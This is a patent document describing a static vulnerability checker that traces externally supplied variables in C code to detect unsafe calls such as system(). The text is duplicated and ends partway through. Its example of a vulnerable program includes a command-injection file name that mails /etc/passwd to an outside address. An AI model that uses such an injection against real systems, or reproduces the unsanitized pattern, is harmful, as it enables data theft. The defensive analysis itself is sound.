US20070271617A1 - Vulnerability check program, vulnerability check apparatus, and vulnerability check method - Google Patents
Vulnerability check program, vulnerability check apparatus, and vulnerability check method Download PDFInfo
- Publication number
- US20070271617A1 US20070271617A1 US11/832,779 US83277907A US2007271617A1 US 20070271617 A1 US20070271617 A1 US 20070271617A1 US 83277907 A US83277907 A US 83277907A US 2007271617 A1 US2007271617 A1 US 2007271617A1
- Authority
- US
- United States
- Prior art keywords
- vulnerability
- variable
- program
- checked
- determination
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Abandoned
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F9/00—Arrangements for program control, e.g. control units
- G06F9/06—Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
- G06F9/44—Arrangements for executing specific programs
- G06F9/445—Program loading or initiating
- G06F9/44589—Program code verification, e.g. Java bytecode verification, proof-carrying code
Definitions
- the present invention relates to a vulnerability check program, a vulnerability check apparatus, and a vulnerability check method that check a program so as to detect vulnerability.
- a program vulnerability check technique is roughly divided into a static check and a dynamic check.
- Vulnerability is a kind of bugs which may cause serious damage, such as system down, system takeover, and information leakage, to program users, if abused, and is also called “security hole”.
- the static check is a check not involving execution of a program.
- a typical static check reads in source code, searches for the names of known vulnerable libraries (including system functions), and outputs an alert message together with information indicating the location in which the vulnerable libraries are used. With this operation, the static check prevents a programmer from containing vulnerability in source code.
- the dynamic check is a check involving execution of a program.
- a typical dynamic check gives input data to a program while monitoring a memory and the like to execute source code line by line, and outputs an alert message if a problem occurs in the source code.
- Patent Document 1 is known as a prior art relating to the present invention.
- a computer process resource modelling method and apparatus disclosed in Patent Document 1 analyzes components constituting a computer program and determines the influence that the components exert on the resource. If a violation of resource's predetermined behavior is detected, a notification is made as a programming error.
- Patent Document 1 PCT Publication No. 10-509258
- the conventional static check typically depends upon a simple pattern matching for vulnerable library names and outputs an alert message for all vulnerable libraries used in the source code. That is, the conventional static check may issue an alert even for vulnerable libraries which are used in a proper manner, so that a programmer needs to cope with a large number of alert massages.
- a checker needs to create a test set which is a set of input data to be given to a program. It is difficult and disadvantageous in cost to create the test set in such a manner to cover various types of vulnerabilities, which raise the threshold for the dynamic check.
- the present invention has been made to solve the above problem, and an object thereof is to provide a vulnerability check program, a vulnerability check apparatus, and a vulnerability check method capable of detecting only a location at which the vulnerable library is not properly used.
- a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked, the program allowing the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
- the determination rule includes a definition of a vulnerable argument in a library function.
- the variable managed by the variable management step includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
- the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value.
- the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
- the program to be checked is source code or an intermediate language file.
- a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked, the program allowing the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
- a vulnerability check apparatus that detects vulnerability of a program to be checked, comprising: a determination rule management section that manages a determination rule concerning vulnerability; a program input section that reads in the program to be checked; a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management section that manages the information concerning the variable; a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output section that outputs an alert message concerning the vulnerability detected by the vulnerability determination section.
- the determination rule includes a definition of a vulnerable argument in a library function.
- the variable managed by the variable management section includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
- the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value or not.
- the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
- the program to be checked is source code or an intermediate language file.
- a vulnerability check apparatus that detects vulnerability of a program to be checked, comprising: a determination rule management section that manages a determination rule concerning vulnerability; a program input section that reads in the program to be checked; a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management section that manages the information concerning the variable; a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output section that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination section.
- a vulnerability check method for detecting vulnerability of a program to be checked comprising: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
- a vulnerability check method for detecting vulnerability of a program to be checked comprising: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
- FIG. 1 is source code showing an example of a vulnerable program
- FIG. 2 is a display showing an example of a normal execution result of a vulnerable program
- FIG. 3 is source code showing an example of a secure program
- FIG. 4 is a block diagram showing an example of a configuration of the vulnerability check apparatus according to the present invention.
- FIG. 5 is a flowchart showing an example of operation of the vulnerability check apparatus according to the present invention.
- FIG. 6 is a flowchart showing an example of operation of variable processing according to the present invention.
- FIG. 7 is a view showing an example of an alert message according to the present invention.
- FIG. 8 is a view showing an example of an intermediate language file
- FIG. 9 is a block diagram showing another example of a configuration of the vulnerability check apparatus according to the present invention.
- FIG. 10 is source code showing an example of the content of a program correction method according to the present invention.
- the present invention is a technique that traces the data flow with an input of external data as a starting point and detects a location at which the external data is directly passed to a dangerous library.
- a vulnerability check apparatus that detects vulnerability contained in the source code of C-language and issues an alert to warn a programmer of the detected vulnerability will be described.
- FIG. 1 shows a vulnerable program “test1.c” as a first program to be checked.
- the “test1.c” is a program that allows a user to input a file name to output detailed information (access restriction, owner, size, last update date, etc.) of a file corresponding to the file name.
- the “test1.c” first performs input processing of a file name in the 9th to 11th lines. Subsequently, in the 13th line, the “test1.c” uses the file name to generate a command character string to be passed to Unix® shell. In this case, “Is-I filename” is used to output the detailed information of the corresponding file. Subsequently, in the 14th line, the “test1.c” passes the command character string to Unix® shell.
- FIG. 2 shows a normal execution result obtained when an existing adequate file name is input.
- test1.c is a vulnerable program which may be exploited.
- a malicious user may input, e.g., “example.txt; mail foo@fuga.com ⁇ /etc/passwd” as a file name.
- the “test1.c” displays the detailed information of a file “example.txt” as proper operation, but executes a command to transmit a password file to “foo@fuga.com” by mail. That is, confidential information is leaked.
- test2.c obtained by solving the problem of “test1.c” is shown in FIG. 3 .
- the “test2.c” checks an input file name.
- a function “Check_file_name” (defined in the 23th to 36th lines) is called to check an input file name. If the file name does not pass the check, the “test2.c” does not process the file name and terminates. As a result, the problem in the “test1.c” does not occur in the “test2.c”.
- Check_file_name This function checks whether a character other than alphameric character, “.” (period), “-” (hyphen), and “_” (underbar) is included in the character string of the file name, because it is considered that only these characters are sufficient for expressing a file name. That is, restriction of characters to be used in the file name prevents an abusive input like the problem in the “test1.c”.
- FIG. 4 is a block diagram showing an example of a configuration of the vulnerability check apparatus according to the present invention.
- the vulnerability check apparatus shown in FIG. 4 includes a program input section 11 , a variable management section 21 , a determination rule management section 22 , a processing flow trace section 31 , a vulnerability determination section 32 , and an alert message output section 41 .
- the determination rule management section 22 manages a previously defined determination rule for vulnerability.
- the determination rule describes a function using an exterior input or argument of a vulnerable library.
- the determination rule may previously be stored in a memory or may previously be stored in a file so as to be read in at the start-up time. This file may be customized by a user.
- the program input section 11 reads in source code, parses the source code, and passes the processing flow to the processing flow trace section 31 .
- This can be implemented by using a function of a C-language compiler. Since the C-language complier parses source code to generate an intermediate language file, the intermediate language is used as the processing flow.
- the source code may include a plurality of files.
- the processing flow trace section 31 extracts an externally input variable whose value is externally input and passes information concerning the variable to the variable management section 21 . Further, the processing flow trace section 31 traces the externally input variable according to the processing flow and extracts a location at which the traced variable is processed as a vulnerable argument of a library function. As the extraction criterion, the determination rule is used.
- the variable management section 21 manages information of each variable obtained from the processing flow trace section 31 as a table.
- the each variable information includes variable name, attribute, position (represented by source file name and line number) at which the attribute has been set.
- the attribute for argument or variable includes “unset” which is a state immediately after variable declaration, “normal” which is a state where a given value has been set and does not belong to any other state, “taint” which is a state where an external input has been made and thus it is likely to generate vulnerability, and “checked” which is a state where check has been made to confirm that the target argument or variable is non-tainted.
- a variable whose attribute is “taint” is called tainted variable.
- the vulnerability determination section 32 determines whether a tainted variable is used as an argument of the vulnerable library defined by the determination rule.
- the alert output section 41 generates an alert massage concerning vulnerability and outputs the alert massage on a screen or file.
- FIG. 5 is a flowchart showing an example of operation of the vulnerability check apparatus according to the present invention.
- the program input section 11 reads in a program and passes the read program to the processing flow trace section 31 (S 11 ). Then, the processing flow trace section 31 extracts an externally input variable according to the determination rule and stores it in the variable table of the variable management section S 12 . Then, the processing flow trace section 31 determines there remains any unchecked variable (S 13 ). If there remains any unchecked variable (Y in S 13 ), the processing flow trace section 31 selects one unchecked variable and checks it (S 14 ), and the flow returns to step S 13 . If there is no unchecked variable (N in S 13 ), this flow is ended.
- step S 14 the processing flow trace section 31 and vulnerability determination section 32 check the selected variable.
- FIG. 6 is a flowchart showing an example of operation of the variable check according to the present invention.
- the processing flow trace section 31 advances the read program by one line (S 21 ). Then, the processing flow trace section 31 determines the program has terminated (S 22 ). If the program has terminated (Y in S 22 ), this flow is ended. If the program has not yet terminated (N in S 22 ), the processing flow trace section 31 determines whether the program has diverged or not (S 23 ). If the program has not diverged (N in S 23 ), the flow shifts to step S 31 . If the program has diverged (Y in S 23 ), the processing flow trace section 31 stores, in the variable table, a variable in the branch location which corresponds to the selected variable (S 24 ).
- the processing flow trace section 31 determines whether the attribute of the stored variable has been checked (S 31 ). If the attribute of the stored variable has been checked (Y in S 31 ), this flow is ended. If the attribute of the stored variable has not been checked (N in S 31 ), the processing flow trace section 31 determines whether the unchecked variable is used in a function (S 32 ). If the variable is not used in a function (N in S 32 ), the flow returns to step S 21 . If the variable is used in a function (Y in S 32 ), the vulnerability determination section 32 determines whether a tainted variable is generated due to transition of the attribute of each variable (S 41 ).
- step S 12 a function using an external input which has been previously defined and arguments (argc, argv) passed to main function are used to extract the externally input variable.
- arguments argc, argv
- the function using an external input its name and location of the argument in which a tainted value can be placed are previously defined in the determination rule. This definition needs to be made in consideration of the use of respective functions. For example, with regard to fgets function, definition is made as follows.
- the fgets function is used such that an externally input value is placed in a first argument, so that this definition means that the first argument is “taint” and arguments other than the first argument and return values are “non-tainted”.
- This definition means that the attribute of a first argument inherits the attribute of a fourth argument in snprintf function. That is, if the fourth argument is “taint”, the first attribute is “taint”, and if the fourth argument is “non-tainted”, the first attribute is “non-tainted”.
- This definition means that when a first argument is “taint” in the system function, an alert message is generated. That is, when the first argument is “taint”, this function is likely to exhibit abnormal behavior, that is, this function has vulnerability.
- step S 31 check is made to determine whether the attribute of a variable has been checked or not. For example, when a check function such as isalnumo is called with a target variable set as an argument, the attribute of the target variable becomes “checked”. Further, when a target variable is used in a conditional expression containing a comparison operator, the attribute of the target variable becomes “checked”.
- step S 44 an alert message concerning vulnerability is generated and output to a screen or file.
- FIG. 7 is a view showing an example of an alert message according to the present invention.
- detection number, function name, and location of argument are output as the alert message.
- Descriptions about vulnerability such as function name, degree of risk, threat, comment are previously defined in the determination rule and are associated with the ID of the detected vulnerability.
- the location at which the tainted data has been set is stored in the variable table, and set function name, file name, line number and the like are output therefrom.
- the location at which a vulnerable library is used can be acquired from the current position of the flow tracing, and used function name, file name line number and the like are output therefrom.
- the vulnerability check apparatus determines that it is likely that a value has externally been input to a variable file_name and that the attribute of the variable file_name is “taint”.
- the vulnerability check apparatus determines that it is likely that the attribute of the variable file_name is passed to the variable is_command and that the attribute of the variable Is_command is “taint”.
- the vulnerability check apparatus determines that it is likely that the system function processes a tainted variable and that vulnerability is generated. Then, the vulnerability check apparatus outputs an alert message to warn a programmer or the like of the detected vulnerability.
- the vulnerability check apparatus determines that a value has externally been input to a variable file_name and that the attribute of the variable file_name is “taint”.
- the vulnerability check apparatus determines that the value of the variable file_name has been checked by a function Check_file_name in 13th line and that the attaribute of the variable file_name is “checked”.
- the vulnerability check apparatus determines that the attribute of variable file_name has been passed to variable Is_command and that the attribute of variable Is_command is “checked”.
- variable Is_command is used as an argument of system function in 19th line
- the vulnerability check apparatus determines that system function processes a variable having a “checked” attribute, that is, determines that it is unlikely that vulnerability is generated.
- alert message is output for one variable in the present embodiment
- a plurality of alert messages for the same variable may be merged.
- alert messages there is often a case where a process in a program diverges due to appearance of if statement and different processing may be applied to the same variable in the branch locations. In this case, there may be a case where vulnerability that is likely to pose a serious risk is detected in one branch location and vulnerability rated low risk is detected in the other branch location.
- To separately output alert messages for both the cases is redundant for a user and, therefore, it is often preferable that the alert messages be merged.
- a method of merging the alert messages there is one that uses an alert message of the highest severity and discards the other alert messages.
- vulnerability check is performed by processing the source code in the present embodiment, it may be performed by processing an intermediate language file.
- the source code readable by humans is compiled and translated into a computer-executable machine language.
- a compiler generates an intermediate language file which is an intermediate file in the above translation process and can output the file onto a disk.
- the intermediate language file is one that represents the source code in the form of nodes unit by unit.
- the intermediate code is inferior in human readability than source code, but not more difficult in decoding than machine language.
- FIG. 8 is a view showing an example of the intermediate language file.
- the vulnerability check apparatus In the case where such intermediate language is read in, the vulnerability check apparatus generates a data flow in the form of a tree structure. Although data form is different, processing of vulnerability check can be performed in a manner similar to the case of source code.
- FIG. 9 is a block diagram showing another example of a configuration of the vulnerability check apparatus according to the present invention.
- the same reference numerals as those in FIG. 4 denote the same or corresponding parts as those in FIG. 4 , and the descriptions thereof will be omitted here.
- the apparatus shown in FIG. 9 differs from that of FIG. 4 in the point that a correction output section 51 is provided in place of the alert output section 41 so as to automatically correct a program.
- a program correction method for vulnerability may previously be defined in the determination rule.
- one field is added to the determination rule concerning system function, and the type of the program correction method is described in the field as follows.
- FIG. 10 is source code showing an example of the content of a program correction method according to the present invention.
- This program correction method 3 inserts, immediately before using system function, logic for checking a string variable used as an argument of the system function. This logic checks whether a character, such as “
- Invalid_String_Error(x) in FIG. 10 is a function defined in a different location and terminates a program by outputting an error.
- the computer-readable medium mentioned here includes: a portable storage medium such as a CD-ROM, a flexible disk, a DVD disk, a magneto-optical disk, or an IC card; a database that holds computer program; another computer and database thereof; and a transmission medium on a network line.
Abstract
Description
- The present invention relates to a vulnerability check program, a vulnerability check apparatus, and a vulnerability check method that check a program so as to detect vulnerability.
- In general, a program vulnerability check technique is roughly divided into a static check and a dynamic check. Vulnerability is a kind of bugs which may cause serious damage, such as system down, system takeover, and information leakage, to program users, if abused, and is also called “security hole”.
- First, the static check will be described.
- Among libraries prepared for a given program language, there exist libraries that should not be used or required to be treated with care since they may cause vulnerability. These libraries are called “vulnerable libraries”. For example, it is said that, in the case of C-language, a library such as “strcpy” which may cause buffer overflow vulnerability which is the most popular vulnerability should not be used but instead “strncpy” should be used. However, in actual source code, such a rule has not been validated.
- The static check is a check not involving execution of a program. A typical static check reads in source code, searches for the names of known vulnerable libraries (including system functions), and outputs an alert message together with information indicating the location in which the vulnerable libraries are used. With this operation, the static check prevents a programmer from containing vulnerability in source code.
- Next, dynamic check will be described.
- The dynamic check is a check involving execution of a program. A typical dynamic check gives input data to a program while monitoring a memory and the like to execute source code line by line, and outputs an alert message if a problem occurs in the source code.
- The following
Patent Document 1 is known as a prior art relating to the present invention. A computer process resource modelling method and apparatus disclosed inPatent Document 1 analyzes components constituting a computer program and determines the influence that the components exert on the resource. If a violation of resource's predetermined behavior is detected, a notification is made as a programming error. - Patent Document 1: PCT Publication No. 10-509258
- Problems to be solved by the Invention
- If a programmer just does not make wrong use of a library, vulnerability does not occur even if the library is one that is generally regarded as vulnerable. For example, if “strcpy” library processes character-string constant, vulnerability cannot be generated. On the other hand, if “strcpy” library processes a character-string constant given from outside, such as a user of a program, buffer overflow vulnerability can be generated when a special character string is given from outside.
- However, the conventional static check typically depends upon a simple pattern matching for vulnerable library names and outputs an alert message for all vulnerable libraries used in the source code. That is, the conventional static check may issue an alert even for vulnerable libraries which are used in a proper manner, so that a programmer needs to cope with a large number of alert massages.
- Further, in the conventional dynamic check, a checker needs to create a test set which is a set of input data to be given to a program. It is difficult and disadvantageous in cost to create the test set in such a manner to cover various types of vulnerabilities, which raise the threshold for the dynamic check.
- The present invention has been made to solve the above problem, and an object thereof is to provide a vulnerability check program, a vulnerability check apparatus, and a vulnerability check method capable of detecting only a location at which the vulnerable library is not properly used.
- To solve the above problems, according to a first aspect of the present invention, there is provided a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked, the program allowing the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
- In the vulnerability check program according to the present invention, the determination rule includes a definition of a vulnerable argument in a library function.
- In the vulnerability check program according to the present invention, the variable managed by the variable management step includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
- In the vulnerability check program according to the present invention, the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value.
- In the vulnerability check program according to the present invention, the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
- In the vulnerability check program according to the present invention, the program to be checked is source code or an intermediate language file.
- According to a second aspect of the present invention, there is provided a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked, the program allowing the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
- According to a third aspect of the present invention, there is provided a vulnerability check apparatus that detects vulnerability of a program to be checked, comprising: a determination rule management section that manages a determination rule concerning vulnerability; a program input section that reads in the program to be checked; a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management section that manages the information concerning the variable; a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output section that outputs an alert message concerning the vulnerability detected by the vulnerability determination section.
- In the vulnerability check apparatus according to the present invention, the determination rule includes a definition of a vulnerable argument in a library function.
- In the vulnerability check apparatus according to the present invention, the variable managed by the variable management section includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
- In the vulnerability check apparatus according to the present invention, the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value or not.
- In the vulnerability check apparatus according to the present invention, the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
- In the vulnerability check apparatus according to the present invention, the program to be checked is source code or an intermediate language file.
- According to a fourth aspect of the present invention, there is provided a vulnerability check apparatus that detects vulnerability of a program to be checked, comprising: a determination rule management section that manages a determination rule concerning vulnerability; a program input section that reads in the program to be checked; a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management section that manages the information concerning the variable; a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output section that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination section.
- According to a fifth aspect of the present invention, there is provided a vulnerability check method for detecting vulnerability of a program to be checked, comprising: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
- According to a sixth aspect of the present invention, there is provided a vulnerability check method for detecting vulnerability of a program to be checked, comprising: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
-
FIG. 1 is source code showing an example of a vulnerable program; -
FIG. 2 is a display showing an example of a normal execution result of a vulnerable program; -
FIG. 3 is source code showing an example of a secure program; -
FIG. 4 is a block diagram showing an example of a configuration of the vulnerability check apparatus according to the present invention; -
FIG. 5 is a flowchart showing an example of operation of the vulnerability check apparatus according to the present invention; -
FIG. 6 is a flowchart showing an example of operation of variable processing according to the present invention; -
FIG. 7 is a view showing an example of an alert message according to the present invention; -
FIG. 8 is a view showing an example of an intermediate language file; -
FIG. 9 is a block diagram showing another example of a configuration of the vulnerability check apparatus according to the present invention; and -
FIG. 10 is source code showing an example of the content of a program correction method according to the present invention. - An Embodiment of the present invention will be described below with reference to the accompanying drawings.
- The present invention is a technique that traces the data flow with an input of external data as a starting point and detects a location at which the external data is directly passed to a dangerous library. In the present invention, a vulnerability check apparatus that detects vulnerability contained in the source code of C-language and issues an alert to warn a programmer of the detected vulnerability will be described.
- First, two programs to be checked will be described as an example.
-
FIG. 1 shows a vulnerable program “test1.c” as a first program to be checked. The “test1.c” is a program that allows a user to input a file name to output detailed information (access restriction, owner, size, last update date, etc.) of a file corresponding to the file name. The “test1.c” first performs input processing of a file name in the 9th to 11th lines. Subsequently, in the 13th line, the “test1.c” uses the file name to generate a command character string to be passed to Unix® shell. In this case, “Is-I filename” is used to output the detailed information of the corresponding file. Subsequently, in the 14th line, the “test1.c” passes the command character string to Unix® shell.FIG. 2 shows a normal execution result obtained when an existing adequate file name is input. - However, the “test1.c” is a vulnerable program which may be exploited. A malicious user may input, e.g., “example.txt; mail foo@fuga.com </etc/passwd” as a file name. In this case, the “test1.c” displays the detailed information of a file “example.txt” as proper operation, but executes a command to transmit a password file to “foo@fuga.com” by mail. That is, confidential information is leaked.
- Next, as an example of a second program to be checked, a secure program “test2.c” obtained by solving the problem of “test1.c” is shown in
FIG. 3 . Unlike the “test1.c”, the “test2.c” checks an input file name. A function “Check_file_name” (defined in the 23th to 36th lines) is called to check an input file name. If the file name does not pass the check, the “test2.c” does not process the file name and terminates. As a result, the problem in the “test1.c” does not occur in the “test2.c”. - Here, a simple description is given of the function “Check_file_name”. This function checks whether a character other than alphameric character, “.” (period), “-” (hyphen), and “_” (underbar) is included in the character string of the file name, because it is considered that only these characters are sufficient for expressing a file name. That is, restriction of characters to be used in the file name prevents an abusive input like the problem in the “test1.c”.
- Next, a configuration of the vulnerability check apparatus according to the present invention will be described.
FIG. 4 is a block diagram showing an example of a configuration of the vulnerability check apparatus according to the present invention. The vulnerability check apparatus shown inFIG. 4 includes aprogram input section 11, avariable management section 21, a determinationrule management section 22, a processingflow trace section 31, avulnerability determination section 32, and an alertmessage output section 41. - The determination
rule management section 22 manages a previously defined determination rule for vulnerability. The determination rule describes a function using an exterior input or argument of a vulnerable library. The determination rule may previously be stored in a memory or may previously be stored in a file so as to be read in at the start-up time. This file may be customized by a user. - The
program input section 11 reads in source code, parses the source code, and passes the processing flow to the processingflow trace section 31. This can be implemented by using a function of a C-language compiler. Since the C-language complier parses source code to generate an intermediate language file, the intermediate language is used as the processing flow. The source code may include a plurality of files. The processingflow trace section 31 extracts an externally input variable whose value is externally input and passes information concerning the variable to thevariable management section 21. Further, the processingflow trace section 31 traces the externally input variable according to the processing flow and extracts a location at which the traced variable is processed as a vulnerable argument of a library function. As the extraction criterion, the determination rule is used. - The
variable management section 21 manages information of each variable obtained from the processingflow trace section 31 as a table. The each variable information includes variable name, attribute, position (represented by source file name and line number) at which the attribute has been set. The attribute for argument or variable includes “unset” which is a state immediately after variable declaration, “normal” which is a state where a given value has been set and does not belong to any other state, “taint” which is a state where an external input has been made and thus it is likely to generate vulnerability, and “checked” which is a state where check has been made to confirm that the target argument or variable is non-tainted. A variable whose attribute is “taint” is called tainted variable. - The
vulnerability determination section 32 determines whether a tainted variable is used as an argument of the vulnerable library defined by the determination rule. Thealert output section 41 generates an alert massage concerning vulnerability and outputs the alert massage on a screen or file. - Next, operation of the vulnerability check apparatus according to the present invention will be described.
FIG. 5 is a flowchart showing an example of operation of the vulnerability check apparatus according to the present invention. - The
program input section 11 reads in a program and passes the read program to the processing flow trace section 31 (S11). Then, the processingflow trace section 31 extracts an externally input variable according to the determination rule and stores it in the variable table of the variable management section S12. Then, the processingflow trace section 31 determines there remains any unchecked variable (S13). If there remains any unchecked variable (Y in S13), the processingflow trace section 31 selects one unchecked variable and checks it (S14), and the flow returns to step S13. If there is no unchecked variable (N in S13), this flow is ended. - In step S14, the processing
flow trace section 31 andvulnerability determination section 32 check the selected variable.FIG. 6 is a flowchart showing an example of operation of the variable check according to the present invention. - The processing
flow trace section 31 advances the read program by one line (S21). Then, the processingflow trace section 31 determines the program has terminated (S22). If the program has terminated (Y in S22), this flow is ended. If the program has not yet terminated (N in S22), the processingflow trace section 31 determines whether the program has diverged or not (S23). If the program has not diverged (N in S23), the flow shifts to step S31. If the program has diverged (Y in S23), the processingflow trace section 31 stores, in the variable table, a variable in the branch location which corresponds to the selected variable (S24). - Then, the processing
flow trace section 31 determines whether the attribute of the stored variable has been checked (S31). If the attribute of the stored variable has been checked (Y in S31), this flow is ended. If the attribute of the stored variable has not been checked (N in S31), the processingflow trace section 31 determines whether the unchecked variable is used in a function (S32). If the variable is not used in a function (N in S32), the flow returns to step S21. If the variable is used in a function (Y in S32), thevulnerability determination section 32 determines whether a tainted variable is generated due to transition of the attribute of each variable (S41). If the tainted variable is not generated (N in S41), the flow shifts to step S43. If the tainted variable is generated (Y in S41), thevulnerability determination section 32 sets the attribute of this variable to “taint” and stores the set attribute in the variable table S42. Then, thevulnerability determination section 32 determines whether vulnerability is generated in the variable according to the determination rule (S43). If vulnerability has not been generated (N in S43), the flow returns to step S21. If vulnerability has been generated (Y is S43), thealert output section 41 outputs an alert message (S44), and this flow is ended. - In step S12, a function using an external input which has been previously defined and arguments (argc, argv) passed to main function are used to extract the externally input variable. With regard to the function using an external input, its name and location of the argument in which a tainted value can be placed are previously defined in the determination rule. This definition needs to be made in consideration of the use of respective functions. For example, with regard to fgets function, definition is made as follows.
- fgets:
param —1=taint - The fgets function is used such that an externally input value is placed in a first argument, so that this definition means that the first argument is “taint” and arguments other than the first argument and return values are “non-tainted”.
- Further, with regard to snprintf function, definition is made as follows.
- snprintf:
param —1=param —4 - This definition means that the attribute of a first argument inherits the attribute of a fourth argument in snprintf function. That is, if the fourth argument is “taint”, the first attribute is “taint”, and if the fourth argument is “non-tainted”, the first attribute is “non-tainted”.
- Further, with regard to system function, definition is made as follows.
- system:alert_if param—1=taint
- This definition means that when a first argument is “taint” in the system function, an alert message is generated. That is, when the first argument is “taint”, this function is likely to exhibit abnormal behavior, that is, this function has vulnerability.
- In step S31, check is made to determine whether the attribute of a variable has been checked or not. For example, when a check function such as isalnumo is called with a target variable set as an argument, the attribute of the target variable becomes “checked”. Further, when a target variable is used in a conditional expression containing a comparison operator, the attribute of the target variable becomes “checked”.
- In step S44, an alert message concerning vulnerability is generated and output to a screen or file.
FIG. 7 is a view showing an example of an alert message according to the present invention. First, detection number, function name, and location of argument are output as the alert message. Descriptions about vulnerability such as function name, degree of risk, threat, comment are previously defined in the determination rule and are associated with the ID of the detected vulnerability. The location at which the tainted data has been set is stored in the variable table, and set function name, file name, line number and the like are output therefrom. The location at which a vulnerable library is used can be acquired from the current position of the flow tracing, and used function name, file name line number and the like are output therefrom. - Next, concrete operations performed in the cases where the vulnerability check apparatus according to the present invention performs vulnerable check for a vulnerable program and for a secure program will be described.
- A case where the vulnerability check apparatus performs vulnerability check for a vulnerable program “test1.c” will first be described.
- Since fgets function is used in 10th line, the vulnerability check apparatus determines that it is likely that a value has externally been input to a variable file_name and that the attribute of the variable file_name is “taint”.
- Then, since snprintf function is used in 13th line, the vulnerability check apparatus determines that it is likely that the attribute of the variable file_name is passed to the variable is_command and that the attribute of the variable Is_command is “taint”.
- Then, since a variable Is-command is used as an argument of system function in 14th line, the vulnerability check apparatus determines that it is likely that the system function processes a tainted variable and that vulnerability is generated. Then, the vulnerability check apparatus outputs an alert message to warn a programmer or the like of the detected vulnerability.
- A case where the vulnerability check apparatus performs vulnerability check for a secure program “test2.c” will next be described.
